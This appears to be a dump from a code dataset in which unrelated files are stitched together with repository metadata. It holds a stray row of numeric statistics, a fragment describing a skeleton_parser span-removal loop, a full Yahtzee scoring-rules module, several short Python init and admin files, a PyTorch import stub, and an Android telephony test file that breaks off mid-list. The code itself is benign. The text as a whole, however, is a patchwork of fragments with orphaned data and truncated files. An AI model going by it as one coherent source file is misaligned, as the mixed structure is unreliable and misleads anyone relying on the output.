| 60.796117 | 168 | 0.666241 | 754 | 6,262 | 5.132626 | 0.147215 | 0.082687 | 0.071318 | 0.046512 | 0.866667 | 0.859432 | 0.859432 | 0.814987 | 0.814987 | 0.814987 | 0 | 0.004702 | 0.184925 | 6,262 | 102 | 169 | 61.392157 | 0.753527 | 0.223251 | 0 | 0.649123 | 0 | 0 | 0.002574 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.122807 | 0 | 0.22807 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
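Both generation functions in skeleton_parser.py follow the same carve-out loop: ask a model for a redundant span, stop if none is found or the sentence would drop below 4 tokens (or after 10 rounds), otherwise remove the span and repeat. A minimal pure-Python sketch of that control flow, under the assumption that spans are contiguous token runs (`simplify` and `finder` are illustrative names, not the project's API):

```python
def simplify(tokens, find_redundant_span, max_rounds=10):
    # mirrors span_tree_generation_head: repeatedly carve out a
    # redundant span until none remains, the sentence gets too
    # short, or the round limit is hit
    removed = []
    for _ in range(max_rounds):
        span = find_redundant_span(tokens)
        if span is None or len(tokens) - len(span) <= 3:
            break
        start = next(i for i in range(len(tokens))
                     if tokens[i:i + len(span)] == span)
        removed.append(span)
        tokens = tokens[:start] + tokens[start + len(span):]
    return tokens, removed

# toy stand-in for the BERT span model: flags one clause as redundant
def finder(tokens):
    clause = ["that", "runs", "fast"]
    return clause if "fast" in tokens else None

core, spans = simplify("the dog that runs fast barks loudly today".split(), finder)
assert core == ["the", "dog", "barks", "loudly", "today"]
assert spans == [["that", "runs", "fast"]]
```

In the real code each removed span also becomes a tree node linked to its headword in the remaining sentence; the sketch only shows the skeleton/span split itself.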
5cf8052e0709de8f2760f2e458d03741bea0cf3b | 29,223 | py | Python | yahtzee/scoring/rules.py | augustopher/yahtzee | 58c292753733286c223a045926e8554c9fb358ee | [
"MIT"
] | null | null | null | yahtzee/scoring/rules.py | augustopher/yahtzee | 58c292753733286c223a045926e8554c9fb358ee | [
"MIT"
] | 11 | 2021-07-17T20:17:27.000Z | 2021-08-07T00:34:35.000Z | yahtzee/scoring/rules.py | augustopher/yahtzee | 58c292753733286c223a045926e8554c9fb358ee | [
"MIT"
] | null | null | null | from ..dice import DiceList
from . import validators as vl
from .. import errors as er
from abc import ABC, abstractmethod
from enum import Enum
from typing import List, Optional
# scores that are constant, regardless of dice values
SCORE_FULL_HOUSE: int = 25
SCORE_SMALL_STRAIGHT: int = 30
SCORE_LARGE_STRAIGHT: int = 40
SCORE_YAHTZEE: int = 50
BONUS_UPPER_SCORE = 35
BONUS_UPPER_THRESHOLD = 63
BONUS_YAHTZEE_SCORE = 100
BONUS_LOWER_SCORE = BONUS_YAHTZEE_SCORE
class Section(Enum):
"""Values for the sections of the scoresheet,
used to organize different rules and bonuses."""
UPPER: str = "upper"
LOWER: str = "lower"
class ScoringRule(ABC):
"""Generic scoring rule.
Parameters
----------
name : str
Name to identify the rule.
section : Section
Section of the scoresheet which the rule belongs to.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
"""
def __init__(self, name: str, section: Section):
self.name = name
self.section = section
self.rule_score: Optional[int] = None
def score(self, dice: DiceList) -> None:
"""Method to score a given set of dice.
Parameters
----------
dice : list of Die
A set of dice to score.
"""
if self._check_rule_not_scored():
self.rule_score = self._score_dice(dice=dice)
else:
raise er.RuleAlreadyScoredError(
f"Rule {self.name} has already been scored."
)
return None
@abstractmethod
def validate(self, dice: DiceList) -> bool:
"""Method to check that a desired pattern
or other trait is present in the given dice.
Parameters
----------
dice : list of Die
A set of dice to check.
Returns
-------
valid_dice : bool
Whether the dice are valid for the given rule or not.
"""
pass # pragma: no cover
@abstractmethod
def _score_dice(self, dice: DiceList) -> int:
"""Method to score a given set of dice.
Parameters
----------
dice : list of Die
A set of dice to score.
Returns
-------
score : int
The score resulting from the dice, based on the rule.
"""
pass # pragma: no cover
def _check_rule_not_scored(self) -> bool:
"""Verifies that the rule has not already been scored.
Returns
-------
rule_not_scored : bool
Whether the rule has been scored or not.
True if not scored, False if scored.
"""
return self.rule_score is None
class ConstantPatternScoringRule(ScoringRule):
"""Generic scoring rule, which looks for a particular pattern,
and has a constant score value.
Parameters
----------
name : str
Name to identify the rule.
section : Section
Section of the scoresheet which the rule belongs to.
score_value : int
The value of the rule if scored with a valid set of dice.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
score_value : int
The value of the rule if scored with a valid set of dice.
"""
def __init__(self, name: str, section: Section, score_value: int):
super().__init__(name=name, section=section)
self.score_value = score_value
def _score_dice(self, dice: DiceList) -> int:
"""Method to score a given set of dice.
Parameters
----------
dice : list of Die
A set of dice to score.
Returns
-------
score : int
The score resulting from the dice, based on the rule.
"""
if self.validate(dice=dice):
return self.score_value
else:
return 0
class VariablePatternScoringRule(ScoringRule):
"""Generic scoring rule, which looks for a particular pattern,
and has a variable score value.
Parameters
----------
name : str
Name to identify the rule.
section : Section
Section of the scoresheet which the rule belongs to.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
"""
def __init__(self, name: str, section: Section):
super().__init__(name=name, section=section)
def _score_dice(self, dice: DiceList) -> int:
"""Method to score a given set of dice.
Parameters
----------
dice : list of Die
A set of dice to score.
Returns
-------
score : int
The score resulting from the dice, based on the rule.
"""
if self.validate(dice=dice):
return self._scoring_func(dice=dice)
else:
return 0
@abstractmethod
def _scoring_func(self, dice: DiceList) -> int:
"""Method for calculating a dice-dependent score.
Parameters
----------
dice : list of Die
A set of dice to score.
Returns
-------
score : int
The score resulting from the dice, based on the rule.
"""
pass # pragma: no cover
class ChanceScoringRule(VariablePatternScoringRule):
"""Rules which take any 5 dice.
Parameters
----------
name : str
Name to identify the rule.
section : Section, default LOWER
Section of the scoresheet which the rule belongs to.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
"""
def __init__(self, name: str, section: Section = Section.LOWER):
super().__init__(name=name, section=section)
def _scoring_func(self, dice: DiceList) -> int:
"""Method for calculating a dice-dependent score.
Scores as the sum of all showing faces.
Parameters
----------
dice : list of Die
A set of dice to score.
Returns
-------
score : int
The score resulting from the dice, based on the rule.
"""
return _sum_all_showing_faces(dice=dice)
def validate(self, dice: DiceList) -> bool:
"""Method to check that the desired pattern
is present in the given dice.
Always validates, since Chance can score for any dice.
Parameters
----------
dice : list of Die
A set of dice to check.
Returns
-------
valid_dice : bool
Whether the dice are valid for the given rule or not.
Since a Chance is just scoring any set of dice,
this will always return `True`.
"""
# Any dice combo is valid
return True
class MultiplesScoringRule(VariablePatternScoringRule):
"""Rules which look for multiple dice with a specific face value.
Parameters
----------
name : str
Name to identify the rule.
section : Section, default UPPER
Section of the scoresheet which the rule belongs to.
face_value : int
Face value needed on a die to be counted in this rule's score.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
face_value : int
Face value needed on a die to be counted in this rule's score.
"""
def __init__(self, name: str, face_value: int, section: Section = Section.UPPER):
super().__init__(name=name, section=section)
self.face_value = face_value
def _scoring_func(self, dice: DiceList) -> int:
"""Method for calculating a dice-dependent score.
Scores as the sum of all showing faces which match the given face value.
Parameters
----------
dice : list of Die
A set of dice to score.
Returns
-------
score : int
The score resulting from the dice, based on the rule.
"""
return _sum_matching_faces(dice=dice, face_value=self.face_value)
def validate(self, dice: DiceList) -> bool:
"""Method to check that the desired pattern
is present in the given dice.
Always validates, since Multiples can score for any dice.
Parameters
----------
dice : list of Die
A set of dice to check.
Returns
-------
valid_dice : bool
Whether the dice are valid for the given rule or not.
Since a Multiple will naturally score ``0`` with no matching dice,
this will always return `True`.
"""
# Any dice combo is valid
return True
class NofKindScoringRule(VariablePatternScoringRule):
"""Rules which look for n-of-a-kind of a face value, without explicitly
specifying the desired face value.
Parameters
----------
name : str
Name to identify the rule.
section : Section, default LOWER
Section of the scoresheet which the rule belongs to.
n : int
Number of matching dice needed for this rule - the "n" in "n-of-a-kind".
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
n : int
Number of matching dice needed for this rule - the "n" in "n-of-a-kind".
"""
def __init__(self, name: str, n: int, section: Section = Section.LOWER):
super().__init__(name=name, section=section)
self.n = n
def _scoring_func(self, dice: DiceList) -> int:
"""Method for calculating a dice-dependent score.
Parameters
----------
dice : list of Die
A set of dice to score.
Returns
-------
score : int
The score resulting from the dice, based on the rule.
"""
return _sum_all_showing_faces(dice=dice)
def validate(self, dice: DiceList) -> bool:
"""Method to check that the desired pattern
is present in the given dice.
Validates if an n-of-a-kind is present,
or if any m-of-a-kind is present (``m > n``).
Parameters
----------
dice : list of Die
A set of dice to check.
Returns
-------
valid_dice : bool
Whether the dice are valid for the given rule or not.
Since m-of-a-kinds (``m > n``) are still valid for a given n,
returns `True` if any m-of-a-kind is present, ``m >= n``.
"""
n_or_more_kind_present = [
vl.validate_nofkind(dice=dice, n=x)
for x in range(self.n, len(dice) + 1)
]
return any(n_or_more_kind_present)
class YahtzeeScoringRule(ConstantPatternScoringRule):
"""Rules which look for a Yahtzee (5-of-a-kind).
Parameters
----------
name : str
Name to identify the rule.
section : Section, default LOWER
Section of the scoresheet which the rule belongs to.
score_value : int, default SCORE_YAHTZEE
The value of the rule if scored with a valid set of dice.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
score_value : int
The value of the rule if scored with a valid set of dice.
"""
def __init__(
self,
name: str,
section: Section = Section.LOWER,
score_value: int = SCORE_YAHTZEE
):
super().__init__(name=name, section=section, score_value=score_value)
def validate(self, dice: DiceList) -> bool:
"""Method to check that the desired pattern
is present in the given dice.
Validates if a Yahtzee (5-of-a-kind) is present.
Parameters
----------
dice : list of Die
A set of dice to check.
Returns
-------
valid_dice : bool
Whether the dice are valid for the given rule or not.
Returns `True` if all dice are the same.
"""
return vl.validate_nofkind(dice=dice, n=len(dice))
class FullHouseScoringRule(ConstantPatternScoringRule):
"""Rules which look for a full house (m-of-a-kind and n-of-a-kind, ``m > n``).
Parameters
----------
name : str
Name to identify the rule.
section : Section, default LOWER
Section of the scoresheet which the rule belongs to.
score_value : int, default SCORE_FULL_HOUSE
The value of the rule if scored with a valid set of dice.
large_n : int, default 3
N for the larger n-of-a-kind required for the full house.
small_n : int, default 2
N for the smaller n-of-a-kind required for the full house.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
score_value : int
The value of the rule if scored with a valid set of dice.
large_n : int
N for the larger n-of-a-kind required for the full house.
small_n : int
N for the smaller n-of-a-kind required for the full house.
"""
def __init__(
self,
name: str,
section: Section = Section.LOWER,
large_n: int = 3,
small_n: int = 2,
score_value: int = SCORE_FULL_HOUSE
):
super().__init__(name=name, section=section, score_value=score_value)
self.large_n = large_n
self.small_n = small_n
def validate(self, dice: DiceList) -> bool:
"""Method to check that the desired pattern
is present in the given dice.
Validates if a full house (m-of-a-kind and n-of-a-kind, ``m > n``) is present.
Parameters
----------
dice : list of Die
A set of dice to check.
Returns
-------
valid_dice : bool
Whether the dice are valid for the given rule or not.
Returns `True` if an two n-of-a-kinds are present,
of sizes `large_n` and `small_n`.
"""
return vl.validate_full_house(
dice=dice,
large_n=self.large_n,
small_n=self.small_n
)
class LargeStraightScoringRule(ConstantPatternScoringRule):
"""Rules which look for a large straight (5 dice sequence).
Parameters
----------
name : str
Name to identify the rule.
section : Section, default LOWER
Section of the scoresheet which the rule belongs to.
score_value : int, default SCORE_LARGE_STRAIGHT
The value of the rule if scored with a valid set of dice.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
score_value : int
The value of the rule if scored with a valid set of dice.
"""
def __init__(
self,
name: str,
section: Section = Section.LOWER,
score_value: int = SCORE_LARGE_STRAIGHT
):
super().__init__(name=name, section=section, score_value=score_value)
def validate(self, dice: DiceList) -> bool:
"""Method to check that the desired pattern
is present in the given dice.
Validates if a large straight (5 consecutive values in 5 dice) is present.
Parameters
----------
dice : list of Die
A set of dice to check.
Returns
-------
valid_dice : bool
Whether the dice are valid for the given rule or not.
Returns `True` if all dice are sequential and unique.
"""
return vl.validate_large_straight(dice=dice)
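`vl.validate_large_straight` also lives elsewhere; the condition it describes (all dice sequential and unique) can be sketched over plain face values like this:

```python
def validate_large_straight(faces):
    """Return True when all faces are unique and consecutive
    (a 5-dice sequence such as 1-2-3-4-5 or 2-3-4-5-6)."""
    ordered = sorted(faces)
    all_unique = len(set(ordered)) == len(ordered)
    # unique values spanning len-1 must be consecutive
    return all_unique and ordered[-1] - ordered[0] == len(ordered) - 1
```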
class SmallStraightScoringRule(ConstantPatternScoringRule):
"""Rules which look for a small straight (4 dice sequence).
Parameters
----------
name : str
Name to identify the rule.
section : Section, default LOWER
Section of the scoresheet which the rule belongs to.
score_value : int, default SCORE_SMALL_STRAIGHT
The value of the rule if scored with a valid set of dice.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
score_value : int
The value of the rule if scored with a valid set of dice.
"""
def __init__(
self,
name: str,
section: Section = Section.LOWER,
score_value: int = SCORE_SMALL_STRAIGHT
):
super().__init__(name=name, section=section, score_value=score_value)
def validate(self, dice: DiceList) -> bool:
"""Method to check that the desired pattern
is present in the given dice.
Validates if a small straight (4 consecutive values in 5 dice) is present.
Parameters
----------
dice : list of Die
A set of dice to check.
Returns
-------
valid_dice : bool
Whether the dice are valid for the given rule or not.
Returns `True` if all-but-one of the dice are sequential and unique.
"""
return vl.validate_small_straight(dice=dice)
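Likewise, the small-straight condition (a run of 4 consecutive values somewhere in the 5 dice) can be sketched as:

```python
def validate_small_straight(faces, run_length=4):
    """Return True when the faces contain a run of run_length
    consecutive unique values (e.g. 2-3-4-5 inside 5 dice)."""
    unique = sorted(set(faces))
    # slide a window over the sorted unique values; a window of
    # run_length values spanning run_length - 1 is consecutive
    for start in range(len(unique) - run_length + 1):
        window = unique[start:start + run_length]
        if window[-1] - window[0] == run_length - 1:
            return True
    return False
```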
def _sum_all_showing_faces(dice: DiceList) -> int:
"""Sums all the showing faces for a set of dice.
Parameters
----------
dice : list of Die
A set of dice to sum.
Returns
-------
dice_sum : int
The sum of all showing faces for the given dice.
"""
return sum([die.showing_face for die in dice if die])
def _sum_matching_faces(dice: DiceList, face_value: int) -> int:
"""Sums all the showing faces which match a given value, for a set of dice.
Parameters
----------
dice : list of Die
A set of dice to sum.
face_value : int
The face value a die must show to be included in the sum.
Returns
-------
dice_sum : int
The sum of all showing faces for the given dice
whose showing face matches the given value.
"""
matching_dice = vl.find_matching_dice(dice=dice, face_value=face_value)
return _sum_all_showing_faces(dice=matching_dice)
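With a hypothetical stand-in for `Die` (the real class is defined elsewhere in the package; only the attribute the helpers read is modelled), the two summing helpers behave like this:

```python
from collections import namedtuple

# stand-in for the real Die class
Die = namedtuple("Die", "showing_face")

def sum_all_showing_faces(dice):
    # `if die` skips empty slots (None entries), as in the original helper
    return sum(die.showing_face for die in dice if die)

def sum_matching_faces(dice, face_value):
    # keep only dice whose showing face matches, then reuse the total
    matching = [die for die in dice if die and die.showing_face == face_value]
    return sum_all_showing_faces(matching)
```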
class BonusRule(ABC):
"""Generic rule for scoring a bonus.
Parameters
----------
name : str
Name to identify the rule.
section : Section
Section of the scoresheet which the rule belongs to.
bonus_value : int
Value used to score the bonus.
Depending on the specific type of bonus, this is either a constant score,
or is multiplied with a counter to get the total bonus score.
counter : int
Tally used in scoring the bonus.
Depending on the specific type of bonus, this is either compared against a
threshold value, or is multiplied with the `bonus_value` to get the total
bonus score.
req_rules : list of ScoringRule, optional
Rules which influence the counter.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
bonus_value : int
Value used to score the bonus.
counter : int
Tally used in scoring the bonus.
req_rules : list of ScoringRule
Rules which influence the counter.
"""
def __init__(
self,
name: str,
section: Section,
bonus_value: int,
counter: int = 0,
req_rules: Optional[List[ScoringRule]] = None
):
self.name = name
self.section = section
self.bonus_value = bonus_value
self.counter = counter
self.req_rules = req_rules
self.rule_score: Optional[int] = None
def increment(self, amt: int = 1) -> None:
"""Method to increment the internal counter.
Parameters
----------
amt : int, default 1
Amount by which to increment `counter`.
"""
self.counter += amt
return None
def score(self) -> None:
"""Method to score a given bonus, and update the associated score value.
Raises
------
RuleAlreadyScoredError
If the rule has already been scored.
"""
if self._check_rule_not_scored():
self.rule_score = self._score_bonus()
else:
raise er.RuleAlreadyScoredError(
f"Rule {self.name} has already been scored."
)
return None
@abstractmethod
def _score_bonus(self) -> int:
"""Method to score a bonus rule.
Returns
-------
score_value : int
Score returned from the bonus scoring logic.
"""
pass # pragma: no cover
def _check_rule_not_scored(self) -> bool:
"""Verifies that the rule has not already been scored.
Returns
-------
rule_not_scored : bool
Whether or not the rule has been scored yet.
Returns `True` if not scored, `False` if scored.
"""
return self.rule_score is None
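The interplay of `score` and `_check_rule_not_scored` boils down to a score-once guard; in miniature (a hypothetical sketch, with `RuntimeError` standing in for `RuleAlreadyScoredError`):

```python
class BonusSketch:
    """Miniature of BonusRule's score-once guard: a second call to
    score() fails instead of overwriting the recorded value."""

    def __init__(self):
        self.rule_score = None  # None means "not yet scored"

    def score(self, value):
        if self.rule_score is not None:
            raise RuntimeError("rule has already been scored")
        self.rule_score = value
```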
class ThresholdBonusRule(BonusRule):
"""Rule for a bonus of which gives points for exceeding a threshold.
Parameters
----------
name : str
Name to identify the rule.
section : Section, default UPPER
Section of the scoresheet which the rule belongs to.
bonus_value : int, default BONUS_UPPER_SCORE
Value used to score the bonus.
Depending on the specific type of bonus, this is either a constant score,
or is multiplied with a counter to get the total bonus score.
counter : int
Tally used in scoring the bonus.
Depending on the specific type of bonus, this is either compared against a
threshold value, or is multiplied with the `bonus_value` to get the total
bonus score.
req_rules : list of ScoringRule, optional
Rules which influence the counter.
threshold : int, default BONUS_UPPER_THRESHOLD
Threshold to determine if bonus is awarded.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
bonus_value : int
Value used to score the bonus.
counter : int
Tally used in scoring the bonus.
req_rules : list of ScoringRule
Rules which influence the counter.
threshold : int
Threshold to determine if bonus is awarded.
"""
def __init__(
self,
name: str,
section: Section = Section.UPPER,
threshold: int = BONUS_UPPER_THRESHOLD,
bonus_value: int = BONUS_UPPER_SCORE,
counter: int = 0,
req_rules: Optional[List[ScoringRule]] = None
):
super().__init__(
name=name,
section=section,
bonus_value=bonus_value,
counter=counter,
req_rules=req_rules
)
self.threshold = threshold
def _score_bonus(self) -> int:
"""Method to score a threshold bonus rule.
Scores as the bonus value if the counter meets the threshold, 0 otherwise.
Returns
-------
score_value : int
Score returned from the bonus scoring logic.
If `counter` meets `threshold`, return `bonus_value`, otherwise ``0``.
"""
if self.counter >= self.threshold:
return self.bonus_value
else:
return 0
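In the standard game, the upper-section bonus awards 35 points once the upper total reaches 63; assuming `BONUS_UPPER_THRESHOLD` and `BONUS_UPPER_SCORE` carry those values, `_score_bonus` reduces to:

```python
def score_threshold_bonus(counter, threshold=63, bonus_value=35):
    # standard Yahtzee upper-section values: reaching a 63 total earns
    # a flat 35-point bonus, anything below it earns nothing
    return bonus_value if counter >= threshold else 0
```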
class CountBonusRule(BonusRule):
"""Rule for a bonus which gives a point value per a count of something.
Parameters
----------
name : str
Name to identify the rule.
section : Section, default LOWER
Section of the scoresheet which the rule belongs to.
bonus_value : int, default BONUS_LOWER_SCORE
Value used to score the bonus.
Depending on the specific type of bonus, this is either a constant score,
or is multiplied with a counter to get the total bonus score.
counter : int
Tally used in scoring the bonus.
Depending on the specific type of bonus, this is either compared against a
threshold value, or is multiplied with the `bonus_value` to get the total
bonus score.
req_rules : list of ScoringRule, optional
Rules which influence the counter.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
bonus_value : int
Value used to score the bonus.
counter : int
Tally used in scoring the bonus.
req_rules : list of ScoringRule
Rules which influence the counter.
"""
def __init__(
self,
name: str,
section: Section = Section.LOWER,
bonus_value: int = BONUS_LOWER_SCORE,
counter: int = 0,
req_rules: Optional[List[ScoringRule]] = None,
):
super().__init__(
name=name,
section=section,
bonus_value=bonus_value,
counter=counter,
req_rules=req_rules
)
def _score_bonus(self) -> int:
"""Method to score a count-based bonus.
Scores as a counter times the bonus value.
Returns
-------
score_value : int
Score returned from the bonus scoring logic.
Simply `counter` times `bonus_value`.
"""
return self.counter * self.bonus_value
class YahtzeeBonusRule(CountBonusRule):
"""Counting bonus rule, specifically for additional Yahtzees rolled after
a `YahtzeeScoringRule` has been scored.
Parameters
----------
name : str
Name to identify the rule.
section : Section, default LOWER
Section of the scoresheet which the rule belongs to.
bonus_value : int, default BONUS_YAHTZEE_SCORE
Value used to score the bonus.
Depending on the specific type of bonus, this is either a constant score,
or is multiplied with a counter to get the total bonus score.
counter : int
Tally used in scoring the bonus.
Depending on the specific type of bonus, this is either compared against a
threshold value, or is multiplied with the `bonus_value` to get the total
bonus score.
req_rules : list of ScoringRule, optional
Rules which influence the counter.
yahtzee_rule : YahtzeeScoringRule
The Yahtzee rule associated with the bonus.
Used to check if a Yahtzee has already been scored,
which impacts how the bonus is scored.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
bonus_value : int
Value used to score the bonus.
counter : int
Tally used in scoring the bonus.
req_rules : list of ScoringRule
Rules which influence the counter.
yahtzee_rule : YahtzeeScoringRule
The Yahtzee rule associated with the bonus.
"""
def __init__(
self,
name: str,
yahtzee_rule: YahtzeeScoringRule,
bonus_value: int = BONUS_YAHTZEE_SCORE,
section: Section = Section.LOWER,
counter: int = 0,
):
super().__init__(
name=name,
section=section,
bonus_value=bonus_value,
counter=counter,
req_rules=None
)
self.yahtzee_rule = yahtzee_rule
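Putting the counting bonus together, assuming the standard 100 points per extra Yahtzee for `BONUS_YAHTZEE_SCORE`, the whole flow is increment-then-multiply:

```python
class CountBonusSketch:
    """Counter-times-value bonus in miniature: each extra Yahtzee bumps
    the counter, and the score is simply counter * bonus_value."""

    def __init__(self, bonus_value=100):
        self.bonus_value = bonus_value
        self.counter = 0

    def increment(self, amt=1):
        self.counter += amt

    def score(self):
        return self.counter * self.bonus_value
```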
# src/tests/Devices/__init__.py (rCorvidae/OrionPI, MIT license)
from tests.Devices.Containers.TestContainersReceivingSerialDataAndObserverPattern import TestContainersReceivingSerialDataAndObserverPattern
from .Containers import *
from .Manipulator import *
from .Propulsion import *
from .TestDeviceAbstractObserverPattern import TestDeviceAbstractObserverPattern
from .TestDeviceManagerFactory import TestDeviceManagerFactory
from .TestDeviceWholesale import TestDeviceGrossSeller
# visualize/admin.py (craig8196/topicalguide, PostgreSQL license)
from django.contrib import admin
from visualize.models import *
admin.site.register(Dataset)
# models/SOTAs/NLP/TransFormer.py (XiaoleiDiao/LowLevelVision-Pipeline-pytorch, MIT license)
import torch
from torch import nn, einsum
# app/admin/__init__.py (davidgacc/docusign, MIT license)
from .utils import create_admin_api_client
# test/connectivity/acts/tests/google/tel/live/TelLiveDataTest.py (Keneral/atools, Unlicense)
#!/usr/bin/env python3.4
#
# Copyright 2016 - Google
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test Script for Telephony Pre Check In Sanity
"""
import time
from acts.base_test import BaseTestClass
from queue import Empty
from acts.test_utils.tel.tel_subscription_utils import \
get_subid_from_slot_index
from acts.test_utils.tel.tel_subscription_utils import set_subid_for_data
from acts.test_utils.tel.TelephonyBaseTest import TelephonyBaseTest
from acts.test_utils.tel.tel_defines import DIRECTION_MOBILE_ORIGINATED
from acts.test_utils.tel.tel_defines import DIRECTION_MOBILE_TERMINATED
from acts.test_utils.tel.tel_defines import DATA_STATE_CONNECTED
from acts.test_utils.tel.tel_defines import GEN_2G
from acts.test_utils.tel.tel_defines import GEN_3G
from acts.test_utils.tel.tel_defines import GEN_4G
from acts.test_utils.tel.tel_defines import NETWORK_SERVICE_DATA
from acts.test_utils.tel.tel_defines import NETWORK_SERVICE_VOICE
from acts.test_utils.tel.tel_defines import RAT_2G
from acts.test_utils.tel.tel_defines import RAT_3G
from acts.test_utils.tel.tel_defines import RAT_4G
from acts.test_utils.tel.tel_defines import RAT_FAMILY_LTE
from acts.test_utils.tel.tel_defines import SIM1_SLOT_INDEX
from acts.test_utils.tel.tel_defines import SIM2_SLOT_INDEX
from acts.test_utils.tel.tel_defines import MAX_WAIT_TIME_NW_SELECTION
from acts.test_utils.tel.tel_defines import MAX_WAIT_TIME_TETHERING_ENTITLEMENT_CHECK
from acts.test_utils.tel.tel_defines import MAX_WAIT_TIME_WIFI_CONNECTION
from acts.test_utils.tel.tel_defines import TETHERING_MODE_WIFI
from acts.test_utils.tel.tel_defines import WAIT_TIME_AFTER_REBOOT
from acts.test_utils.tel.tel_defines import WAIT_TIME_ANDROID_STATE_SETTLING
from acts.test_utils.tel.tel_defines import WAIT_TIME_BETWEEN_REG_AND_CALL
from acts.test_utils.tel.tel_defines import \
WAIT_TIME_DATA_STATUS_CHANGE_DURING_WIFI_TETHERING
from acts.test_utils.tel.tel_defines import WAIT_TIME_TETHERING_AFTER_REBOOT
from acts.test_utils.tel.tel_data_utils import airplane_mode_test
from acts.test_utils.tel.tel_data_utils import change_data_sim_and_verify_data
from acts.test_utils.tel.tel_data_utils import data_connectivity_single_bearer
from acts.test_utils.tel.tel_data_utils import ensure_wifi_connected
from acts.test_utils.tel.tel_data_utils import tethering_check_internet_connection
from acts.test_utils.tel.tel_data_utils import wifi_cell_switching
from acts.test_utils.tel.tel_data_utils import wifi_tethering_cleanup
from acts.test_utils.tel.tel_data_utils import wifi_tethering_setup_teardown
from acts.test_utils.tel.tel_test_utils import WifiUtils
from acts.test_utils.tel.tel_test_utils import call_setup_teardown
from acts.test_utils.tel.tel_test_utils import ensure_phones_default_state
from acts.test_utils.tel.tel_test_utils import ensure_phones_idle
from acts.test_utils.tel.tel_test_utils import ensure_network_generation
from acts.test_utils.tel.tel_test_utils import \
ensure_network_generation_for_subscription
from acts.test_utils.tel.tel_test_utils import get_slot_index_from_subid
from acts.test_utils.tel.tel_test_utils import get_network_rat_for_subscription
from acts.test_utils.tel.tel_test_utils import hangup_call
from acts.test_utils.tel.tel_test_utils import multithread_func
from acts.test_utils.tel.tel_test_utils import set_call_state_listen_level
from acts.test_utils.tel.tel_test_utils import setup_sim
from acts.test_utils.tel.tel_test_utils import toggle_airplane_mode
from acts.test_utils.tel.tel_test_utils import toggle_volte
from acts.test_utils.tel.tel_test_utils import verify_http_connection
from acts.test_utils.tel.tel_test_utils import verify_incall_state
from acts.test_utils.tel.tel_test_utils import wait_for_cell_data_connection
from acts.test_utils.tel.tel_test_utils import wait_for_network_rat
from acts.test_utils.tel.tel_test_utils import \
wait_for_voice_attach_for_subscription
from acts.test_utils.tel.tel_test_utils import \
wait_for_data_attach_for_subscription
from acts.test_utils.tel.tel_test_utils import wait_for_wifi_data_connection
from acts.test_utils.tel.tel_voice_utils import is_phone_in_call_3g
from acts.test_utils.tel.tel_voice_utils import is_phone_in_call_csfb
from acts.test_utils.tel.tel_voice_utils import is_phone_in_call_volte
from acts.test_utils.tel.tel_voice_utils import phone_setup_voice_3g
from acts.test_utils.tel.tel_voice_utils import phone_setup_csfb
from acts.test_utils.tel.tel_voice_utils import phone_setup_voice_general
from acts.test_utils.tel.tel_voice_utils import phone_setup_volte
from acts.test_utils.wifi.wifi_test_utils import WifiEnums
from acts.utils import disable_doze
from acts.utils import enable_doze
from acts.utils import load_config
from acts.utils import rand_ascii_str
class TelLiveDataTest(TelephonyBaseTest):
def __init__(self, controllers):
TelephonyBaseTest.__init__(self, controllers)
self.tests = ("test_airplane_mode",
"test_4g",
"test_3g",
"test_2g",
"test_lte_wifi_switching",
"test_wcdma_wifi_switching",
"test_gsm_wifi_switching",
"test_wifi_connect_disconnect",
"test_lte_multi_bearer",
"test_wcdma_multi_bearer",
"test_2g_wifi_not_associated",
"test_3g_wifi_not_associated",
"test_4g_wifi_not_associated",
# WiFi Tethering tests
"test_tethering_entitlement_check",
"test_tethering_2g_to_2gwifi",
"test_tethering_2g_to_5gwifi",
"test_tethering_3g_to_5gwifi",
"test_tethering_3g_to_2gwifi",
